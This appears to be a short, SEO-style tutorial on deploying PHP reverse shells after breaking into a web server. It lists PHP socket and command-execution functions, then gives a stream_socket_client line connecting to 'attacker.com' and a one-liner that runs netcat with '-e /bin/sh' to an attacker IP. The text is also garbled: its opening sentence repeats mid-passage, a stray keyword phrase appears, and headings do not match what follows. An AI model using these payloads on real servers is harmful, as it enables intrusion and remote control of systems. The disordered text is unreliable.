When you gain access to a web server—whether through a file upload vulnerability, a misconfigured content management system (CMS), or a Local File Inclusion (LFI) exploit—the next logical step is establishing a stable foothold. On Linux/Unix-based web servers, PHP remains the undisputed king for deploying quick, effective reverse shells.
Why? Because PHP runs on the server side and has built-in functions to execute system commands. If the web server (like Apache or Nginx) has permissions to make outbound connections, a PHP reverse shell is often the path of least resistance.
Here is a breakdown of the top techniques for executing PHP reverse shells, from the basics to bypassing defenses. reverse shell php top
| Function | Purpose |
|----------|---------|
| fsockopen() | Open TCP socket connection to attacker |
| pfsockopen() | Persistent version of fsockopen |
| socket_create() | Low-level socket creation |
| exec(), system() | Execute OS commands |
| proc_open() | Advanced process control (with pipes) |
| die() or exit() | Terminate script if connection fails |
| fwrite() / fread() | Read/write over socket |
| shell_exec() | Return command output as string |
Detect common patterns:
Using stream_socket_client() with SSL:
$context = stream_context_create(['ssl' => ['verify_peer' => false]]);
$sock = stream_socket_client('ssl://attacker.com:443', $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context);
Sometimes, for simplicity and evasion, a one-liner is used: When you gain access to a web server—whether
<?php exec("nc your_attacker_ip_address 4444 -e /bin/sh"); ?>
Before diving into the "top" scripts, it’s crucial to understand the network dynamics.